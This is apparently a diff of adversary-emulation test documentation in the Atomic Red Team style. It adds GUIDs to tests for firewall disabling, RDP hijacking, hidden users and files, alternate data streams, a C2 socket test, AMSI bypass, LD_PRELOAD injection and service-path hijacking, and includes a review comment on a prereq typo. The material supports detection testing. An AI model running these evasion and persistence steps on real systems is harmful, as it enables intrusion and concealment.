+auto_generated_guid: 88d05800-a5e4-407e-9b53-ece4174f197f
+
Disables the Microsoft Defender Firewall for the current profile. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
-
**Supported Platforms:** Windows
@@ -87,9 +91,11 @@ netsh advfirewall set currentprofile state on >nul 2>&1
## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry
+
+auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612
+
Disables the Microsoft Defender Firewall for the public profile via registry Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile...
-
**Supported Platforms:** Windows
@@ -116,9 +122,11 @@ reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Param
## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall
+
+auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1
+
Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services...
-
**Supported Platforms:** Windows
@@ -146,10 +154,12 @@ netsh advfirewall reset >nul 2>&1
## Atomic Test #5 - Opening ports for proxy - HARDRAIN
+
+auto_generated_guid: 15e57006-79dd-46df-9bf9-31bc24fb5a80
+
This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf
-
**Supported Platforms:** Windows
@@ -176,15 +186,17 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp
## Atomic Test #6 - Open a local port through Windows Firewall to any profile
-This test will attempt to open a local port defined by input arguments to any profile
+auto_generated_guid: 9636dd6e-7599-40d2-8eee-ac16434f35ed
+
+This test will attempt to open a local port defined by input arguments to any profile
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| local_port | This is the local port you wish to test opening | integer | 3389|
@@ -209,15 +221,17 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null
## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location
-This test will attempt to allow an executable through the system firewall located in the Users directory
+auto_generated_guid: 6f5822d2-d38d-4f48-9bfc-916607ff6b8c
+
+This test will attempt to allow an executable through the system firewall located in the Users directory
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| exe_file_path | path to exe file | path | PathToAtomicsFolder\T1562.004\bin\AtomicTest.exe|
diff --git a/atomics/T1562.006/T1562.006.md b/atomics/T1562.006/T1562.006.md
index 0671e974..c4da8863 100644
--- a/atomics/T1562.006/T1562.006.md
+++ b/atomics/T1562.006/T1562.006.md
@@ -16,15 +16,17 @@ In the case of network-based reporting of indicators, an adversary may block tra
## Atomic Test #1 - Auditing Configuration Changes on Linux Host
-Emulates modification of auditd configuration files
+auto_generated_guid: 212cfbcf-4770-4980-bc21-303e37abd0e3
+
+Emulates modification of auditd configuration files
**Supported Platforms:** Linux
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| audisp_config_file_name | The name of the audispd configuration file to be changed | string | audispd.conf|
| auditd_config_file_name | The name of the auditd configuration file to be changed | string | auditd.conf|
@@ -61,15 +63,17 @@ sed -i '$ d' /etc/#{libaudit_config_file_name}
## Atomic Test #2 - Logging Configuration Changes on Linux Host
-Emulates modification of syslog configuration.
+auto_generated_guid: 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c
+
+Emulates modification of syslog configuration.
**Supported Platforms:** Linux
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| syslog_config_file_name | The name of the syslog configuration file to be changed | string | syslog.conf|
| rsyslog_config_file_name | The name of the rsyslog configuration file to be changed | string | rsyslog.conf|
diff --git a/atomics/T1563.002/T1563.002.md b/atomics/T1563.002/T1563.002.md
index 7db2e09b..766f1007 100644
--- a/atomics/T1563.002/T1563.002.md
+++ b/atomics/T1563.002/T1563.002.md
@@ -12,15 +12,17 @@ Adversaries may perform RDP session hijacking which involves stealing a legitima
## Atomic Test #1 - RDP hijacking
-[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
+auto_generated_guid: a37ac520-b911-458e-8aed-c5f1576d9f46
+
+[RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6) - how to hijack RDS and RemoteApp sessions transparently to move through an organization
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Session_ID | The ID of the session to which you want to connect | String | 1337|
| Destination_ID | Connect the session of another user to a different session | String | rdp-tcp#55|
diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md
index 34beb7d0..33358e45 100644
--- a/atomics/T1564.001/T1564.001.md
+++ b/atomics/T1564.001/T1564.001.md
@@ -28,8 +28,10 @@ Adversaries can use this to their advantage to hide files and folders anywhere o
## Atomic Test #1 - Create a hidden file in a hidden directory
-Creates a hidden file inside a hidden directory
+auto_generated_guid: 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be
+
+Creates a hidden file inside a hidden directory
**Supported Platforms:** Linux, macOS
@@ -57,8 +59,10 @@ rm -rf /var/tmp/.hidden-directory/
## Atomic Test #2 - Mac Hidden file
-Hide a file on MacOS
+auto_generated_guid: cddb9098-3b47-4e01-9d3b-6f5f323288a9
+
+Hide a file on MacOS
**Supported Platforms:** macOS
@@ -81,16 +85,18 @@ xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF
## Atomic Test #3 - Create Windows System File with Attrib
+
+auto_generated_guid: f70974c8-c094-4574-b542-2c545af95a32
+
Creates a file and marks it as a system file using the attrib.exe utility. Upon execution, open the file in file explorer then open Properties > Details and observe that the Attributes are "SA" for System and Archive.
-
**Supported Platforms:** Windows
#### Inputs:
-| Name | Description | Type | Default Value |
+| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_to_modify | File to modify using Attrib command | string | %temp%\T1564.001.txt|
@@ -113,7 +119,7 @@ del /A:S #{file_to_modify} >nul 2>&1
##### Description: The file must exist on disk at specified location (#{file_to_modify})
##### Check Prereq Commands:
```cmd
-IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
+IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 )
```
##### Get Prereq Commands:
```cmd
@@ -127,16 +133,18 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #4 - Create Windows Hidden File with Attrib + +auto_generated_guid: dadb792e-4358-4d8d-9207-b771faa0daa5 + Creates a file and marks it as hidden using the attrib.exe utility.Upon execution, open File Epxplorer and enable View > Hidden Items. Then, open Properties > Details on the file and observe that the Attributes are "SH" for System and Hidden. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_to_modify | File to modify using Attrib command | string | %temp%\T1564.001.txt| @@ -159,7 +167,7 @@ del /A:H #{file_to_modify} >nul 2>&1 ##### Description: The file must exist on disk at specified location (#{file_to_modify}) ##### Check Prereq Commands: ```cmd -IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) +IF EXIST #{file_to_modify} ( EXIT 0 ) ELSE ( EXIT 1 ) ``` ##### Get Prereq Commands: ```cmd @@ -173,15 +181,17 @@ echo system_Attrib_T1564.001 >> #{file_to_modify}
## Atomic Test #5 - Hidden files -Requires Apple Dev Tools +auto_generated_guid: 3b7015f2-3144-4205-b799-b05580621379 + +Requires Apple Dev Tools **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | filename | path of file to hide | path | /tmp/evil| @@ -202,8 +212,10 @@ setfile -a V #(unknown)
## Atomic Test #6 - Hide a Directory -Hide a directory on MacOS +auto_generated_guid: b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 + +Hide a directory on MacOS **Supported Platforms:** macOS @@ -231,8 +243,10 @@ rm /var/tmp/T1564.001_mac.txt
## Atomic Test #7 - Show all hidden files -Show all hidden files on MacOS +auto_generated_guid: 9a1ec7da-b892-449f-ad68-67066d04380c + +Show all hidden files on MacOS **Supported Platforms:** macOS diff --git a/atomics/T1564.002/T1564.002.md b/atomics/T1564.002/T1564.002.md index f5066ac0..eb504c9a 100644 --- a/atomics/T1564.002/T1564.002.md +++ b/atomics/T1564.002/T1564.002.md @@ -14,15 +14,17 @@ There is a property value in /Library/Preferences/com.apple.loginwindow ## Atomic Test #1 - Create Hidden User using UniqueID < 500 -Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) +auto_generated_guid: 4238a7f0-a980-4fff-98a2-dfc0a363d507 + +Add a hidden user on macOS using Unique ID < 500 (users with that ID are hidden by default) **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username to add | string | APT| @@ -47,15 +49,17 @@ sudo dscl . -delete /Users/#{user_name}
## Atomic Test #2 - Create Hidden User using IsHidden option -Add a hidden user on macOS using IsHidden optoin +auto_generated_guid: de87ed7b-52c3-43fd-9554-730f695e7f31 + +Add a hidden user on macOS using IsHidden optoin **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username to add | string | APT| diff --git a/atomics/T1564.003/T1564.003.md b/atomics/T1564.003/T1564.003.md index 90ebee33..a554980d 100644 --- a/atomics/T1564.003/T1564.003.md +++ b/atomics/T1564.003/T1564.003.md @@ -16,16 +16,18 @@ Adversaries may abuse these functionalities to hide otherwise visible windows fr
## Atomic Test #1 - Hidden Window + +auto_generated_guid: f151ee37-9e2b-47e6-80e4-550b9f999b7a + Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden. Upon execution a hidden PowerShell window will launch calc.exe - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | powershell_command | Command to launch calc.exe from a hidden PowerShell Window | String | powershell.exe -WindowStyle hidden calc.exe| diff --git a/atomics/T1564.004/T1564.004.md b/atomics/T1564.004/T1564.004.md index 1ae1c4e7..1a314f8c 100644 --- a/atomics/T1564.004/T1564.004.md +++ b/atomics/T1564.004/T1564.004.md @@ -18,19 +18,21 @@ Adversaries may store malicious data or binaries in file attribute metadata inst
## Atomic Test #1 - Alternate Data Streams (ADS) + +auto_generated_guid: 8822c3b0-d9f9-4daf-a043-49f4602364f4 + Execute from Alternate Streams [Reference - 1](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f) [Reference - 2](https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path | Path of ADS file | path | c:\ADS\| @@ -60,16 +62,18 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
## Atomic Test #2 - Store file in Alternate Data Stream (ADS) + +auto_generated_guid: 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 + Storing files in Alternate Data Stream (ADS) similar to Astaroth malware. Upon execution cmd will run and attempt to launch desktop.ini. No windows remain open after the test - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | payload_path | Path of file to hide in ADS | path | c:\windows\system32\cmd.exe| | ads_file_path | Path of file to create an ADS under | path | C:\Users\Public\Libraries\yanki\desktop.ini| @@ -99,16 +103,18 @@ Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
## Atomic Test #3 - Create ADS command prompt + +auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb + Create an Alternate Data Stream with the command prompt. Write access is required. Upon execution, run "dir /a-d /s /r | find ":$DATA"" in the %temp% folder to view that the alternate data stream exists. To view the data in the alternate data stream, run "notepad T1564.004_has_ads.txt:adstest.txt" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | File name of file to create ADS on. | string | %temp%\T1564.004_has_ads_cmd.txt| | ads_filename | Name of ADS. | string | adstest.txt| @@ -135,16 +141,18 @@ del #{file_name} >nul 2>&1
## Atomic Test #4 - Create ADS PowerShell + +auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 + Create an Alternate Data Stream with PowerShell. Write access is required. To verify execution, the the command "ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname" in the %temp% direcotry to view all files with hidden data streams. To view the data in the alternate data stream, run "notepad.exe T1564.004_has_ads_powershell.txt:adstest.txt" in the %temp% folder. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_name | File name of file to create ADS on. | string | $env:TEMP\T1564.004_has_ads_powershell.txt| | ads_filename | Name of ADS file. | string | adstest.txt| @@ -170,7 +178,7 @@ Remove-Item -Path #{file_name} -ErrorAction Ignore ##### Description: The file must exist on disk at specified location (#{file_name}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{file_name}) { exit 0 } else { exit 1 } +if (Test-Path #{file_name}) { exit 0 } else { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 333370c2..4bdd4e75 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -16,6 +16,9 @@ Adversaries may also attempt to hide artifacts associated with malicious behavio
## Atomic Test #1 - Extract binary files via VBA + +auto_generated_guid: 6afe288a-8a8b-4d33-a629-8d03ba9dad3a + This module extracts a binary (calc.exe) from inside of another binary. In the wild maldoc authors will use this technique to hide binaries inside of files stored @@ -27,7 +30,6 @@ This sample contains a document inside of itself. Document 1 is the actual maldo is the same document without all the malicious code. Document 1 will copy Document 2 to the file system and then "peek" inside of this document and pull out the oleObject.bin file. Contained inside of this oleObject.bin file is a payload that is parsed out and executed on the file system. - **Supported Platforms:** Windows @@ -60,7 +62,7 @@ try { New-Object -COMObject "Word.Application" | Out-Null Stop-Process -Name "winword" exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -74,8 +76,10 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
## Atomic Test #2 - Create a Hidden User Called "$" -Creating a user with a username containing "$" +auto_generated_guid: 2ec63cc2-4975-41a6-bf09-dffdfb610778 + +Creating a user with a username containing "$" **Supported Platforms:** Windows @@ -102,8 +106,10 @@ net user $ /DELETE 2>&1
## Atomic Test #3 - Create an "Administrator " user (with a space on the end) -Creating a user with a username containing with a space on the end +auto_generated_guid: 5bb20389-39a5-4e99-9264-aeb92a55a85c + +Creating a user with a username containing with a space on the end **Supported Platforms:** Windows diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index 08745edd..7a3de378 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -14,10 +14,12 @@ There are many options for the attachment such as Microsoft Office documents, ex
## Atomic Test #1 - Download Phishing Attachment - VBScript + +auto_generated_guid: 114ccff9-ae6d-4547-9ead-4cd69f687306 + The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com). The below will successfully download the macro-enabled Excel file to the current location. File is downloaded to the %temp% folder. - **Supported Platforms:** Windows @@ -51,16 +53,18 @@ else{
## Atomic Test #2 - Word spawned a command shell and used an IP address in the command line + +auto_generated_guid: cbb6799a-425c-4f83-9194-5447a909d67f + Word spawning a command prompt then running a command with an IP address in the command line is an indiciator of malicious activity. Upon execution, CMD will be lauchned and ping 8.8.8.8 - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse| | ms_product | Maldoc application Word or Excel | String | Word| @@ -92,7 +96,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1569.001/T1569.001.md b/atomics/T1569.001/T1569.001.md index 62e0d648..1c14ffe9 100644 --- a/atomics/T1569.001/T1569.001.md +++ b/atomics/T1569.001/T1569.001.md @@ -14,15 +14,17 @@ Running a command from launchctl is as simple as launchctl submit -l ## Atomic Test #1 - Launchctl -Utilize launchctl +auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 + +Utilize launchctl **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | executable_path | Path of the executable to run. | path | /System/Applications/Calculator.app/Contents/MacOS/Calculator| | label_name | Path of the executable to run. | string | evil| diff --git a/atomics/T1569.002/T1569.002.md b/atomics/T1569.002/T1569.002.md index be720344..6015e492 100644 --- a/atomics/T1569.002/T1569.002.md +++ b/atomics/T1569.002/T1569.002.md @@ -16,17 +16,19 @@ Adversaries may leverage these mechanisms to execute malicious content. This can
## Atomic Test #1 - Execute a Command as a Service + +auto_generated_guid: 2382dee2-a75f-49aa-9378-f52df6ed3fb1 + Creates a service specifying an aribrary command and executes it. When executing commands such as PowerShell, the service will report that it did not start correctly even when code executes properly. Upon successful execution, cmd.exe create a new service using sc.exe create that will start powershell.exe to create a new file `art-marker.txt` - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_name | Name of service to create | string | ARTService| | executable_command | Command to execute as a service | string | %COMSPEC% /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt| @@ -54,18 +56,20 @@ del C:\art-marker.txt >nul 2>&1
## Atomic Test #2 - Use PsExec to execute a command on a remote host + +auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c + Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments Will start a process on a remote host. Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_host | Remote hostname or IP address | string | localhost| | user_name | Username | String | DOMAIN\Administrator| @@ -87,7 +91,7 @@ Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a re ##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) ##### Check Prereq Commands: ```powershell -if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} +if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1571/T1571.md b/atomics/T1571/T1571.md index 2cb01cc2..a9aae7f5 100644 --- a/atomics/T1571/T1571.md +++ b/atomics/T1571/T1571.md @@ -12,16 +12,18 @@
## Atomic Test #1 - Testing usage of uncommonly used port with PowerShell + +auto_generated_guid: 21fe622f-8e53-4b31-ba83-6d333c2583f4 + Testing uncommonly used port utilizing PowerShell. APT33 has been known to attempt telnet over port 8081. Upon execution, details about the successful port check will be displayed. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| @@ -43,15 +45,17 @@ Test-NetConnection -ComputerName #{domain} -port #{port}
## Atomic Test #2 - Testing usage of uncommonly used port -Testing uncommonly used port utilizing telnet. +auto_generated_guid: 5db21e1d-dd9c-4a50-b885-b1e748912767 + +Testing uncommonly used port utilizing telnet. **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | port | Specify uncommon port number | String | 8081| | domain | Specify target hostname | String | google.com| diff --git a/atomics/T1573/T1573.md b/atomics/T1573/T1573.md index ae595366..ef035415 100644 --- a/atomics/T1573/T1573.md +++ b/atomics/T1573/T1573.md @@ -10,20 +10,22 @@
## Atomic Test #1 - OpenSSL C2 + +auto_generated_guid: 21caf58e-87ad-440c-a6b8-3ac259964003 + Thanks to @OrOneEqualsOne for this quick C2 method. This is to test to see if a C2 session can be established using an SSL socket. More information about this technique, including how to set up the listener, can be found here: https://medium.com/walmartlabs/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926 Upon successful execution, powershell will make a network connection to 127.0.0.1 over 443. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | server_ip | IP of the external server | String | 127.0.0.1| | server_port | The port to connect to on the external server | String | 443| diff --git a/atomics/T1574.001/T1574.001.md b/atomics/T1574.001/T1574.001.md index beaef109..dcc50b0e 100644 --- a/atomics/T1574.001/T1574.001.md +++ b/atomics/T1574.001/T1574.001.md @@ -16,11 +16,13 @@ If a search order-vulnerable program is configured to run at a higher privilege
## Atomic Test #1 - DLL Search Order Hijacking - amsi.dll + +auto_generated_guid: 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 + Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface) https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ Upon successful execution, powershell.exe will be copied and renamed to updater.exe and load amsi.dll from a non-standard path. - **Supported Platforms:** Windows diff --git a/atomics/T1574.002/T1574.002.md b/atomics/T1574.002/T1574.002.md index a5c25e44..10229d09 100644 --- a/atomics/T1574.002/T1574.002.md +++ b/atomics/T1574.002/T1574.002.md @@ -12,16 +12,18 @@ Side-loading takes advantage of the DLL search order used by the loader by posit
## Atomic Test #1 - DLL Side-Loading using the Notepad++ GUP.exe binary + +auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 + GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. Upon execution, calc.exe will be opened. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_name | Name of the created process | string | calculator.exe| | gup_executable | GUP is an open source signed binary used by Notepad++ for software updates | path | PathToAtomicsFolder\T1574.002\bin\GUP.exe| @@ -45,7 +47,7 @@ taskkill /F /IM #{process_name} >nul 2>&1 ##### Description: Gup.exe binary must exist on disk at specified location (#{gup_executable}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{gup_executable}) {exit 0} else {exit 1} +if (Test-Path #{gup_executable}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1574.006/T1574.006.md b/atomics/T1574.006/T1574.006.md index 8d8a9ab8..ec61d98f 100644 --- a/atomics/T1574.006/T1574.006.md +++ b/atomics/T1574.006/T1574.006.md @@ -18,17 +18,19 @@ On macOS this behavior is conceptually the same as on Linux, differing only in h
## Atomic Test #1 - Shared Library Injection via /etc/ld.so.preload + +auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + This test adds a shared library to the `ld.so.preload` list to execute and intercept API calls. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c| | path_to_shared_library | Path to a shared library object | Path | /tmp/T1574006.so| @@ -52,7 +54,7 @@ sudo sed -i '\~#{path_to_shared_library}~d' /etc/ld.so.preload ##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library}) ##### Check Prereq Commands: ```bash -if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; +if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash @@ -66,17 +68,19 @@ gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source}
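Review bot: The check-prereq command on the new side, `if [ -f #{path_to_shared_library ]; then exit 0; else exit 1; fi;`, is missing the closing brace of the `#{path_to_shared_library}` placeholder, so the value is never substituted and the test checks a literal, non-existent path — the prerequisite will always report unmet and the get-prereq `gcc` step will run on every execution. The whitespace-only touch here is the moment to fix it: `if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi;`, matching Test #2 further down in the same file. Since this markdown is presumably generated from T1574.006.yaml, the correction belongs in that file's `prereq_command` and the markdown should be regenerated, otherwise the next generation pass reintroduces the typo.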
## Atomic Test #2 - Shared Library Injection via LD_PRELOAD + +auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae + This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_shared_library_source | Path to a shared library source code | Path | PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c| | path_to_shared_library | Path to a shared library object | Path | /tmp/T1574006.so| @@ -96,7 +100,7 @@ LD_PRELOAD=#{path_to_shared_library} ls ##### Description: The shared library must exist on disk at specified location (#{path_to_shared_library}) ##### Check Prereq Commands: ```bash -if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; +if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```bash diff --git a/atomics/T1574.009/T1574.009.md b/atomics/T1574.009/T1574.009.md index 88973d56..ffc87c80 100644 --- a/atomics/T1574.009/T1574.009.md +++ b/atomics/T1574.009/T1574.009.md @@ -14,17 +14,19 @@ This technique can be used for persistence if executables are called on a regula
## Atomic Test #1 - Execution of program.exe as service with unquoted service path + +auto_generated_guid: 2770dea7-c50f-457b-84c4-c40a47460d9f + When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges. In this case, if an executable program.exe in C:\ exists, C:\program.exe will be executed instead of test.exe in C:\Program Files\subfolder\test.exe. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | service_executable | Path of the executable used for the service and as the hijacked program.exe | path | PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe| diff --git a/atomics/T1574.011/T1574.011.md b/atomics/T1574.011/T1574.011.md index f07dc900..18600716 100644 --- a/atomics/T1574.011/T1574.011.md +++ b/atomics/T1574.011/T1574.011.md @@ -16,16 +16,18 @@ Adversaries may also alter Registry keys associated with service failure paramet
## Atomic Test #1 - Service Registry Permissions Weakness + +auto_generated_guid: f7536d63-7fd4-466f-89da-7e48d550752a + Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg. reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe" - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | weak_service_name | weak service check | String | weakservicename| @@ -47,15 +49,17 @@ get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |F
## Atomic Test #2 - Service ImagePath Change with reg.exe -Change Service registry ImagePath of a bengin service to a malicious file +auto_generated_guid: f38e9eea-e1d7-4ba6-b716-584791963827 + +Change Service registry ImagePath of a bengin service to a malicious file **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | weak_service_name | weak service name | String | calcservice| | weak_service_path | weak service path | String | %windir%\system32\win32calc.exe| @@ -80,7 +84,7 @@ sc.exe delete #{weak_service_name} ##### Description: The service must exist (#{weak_service_name}) ##### Check Prereq Commands: ```powershell -if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} +if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1574.012/T1574.012.md b/atomics/T1574.012/T1574.012.md index b84c5d66..958aac95 100644 --- a/atomics/T1574.012/T1574.012.md +++ b/atomics/T1574.012/T1574.012.md @@ -18,6 +18,9 @@ Adversaries may abuse COR_PROFILER to establish persistence that executes a mali
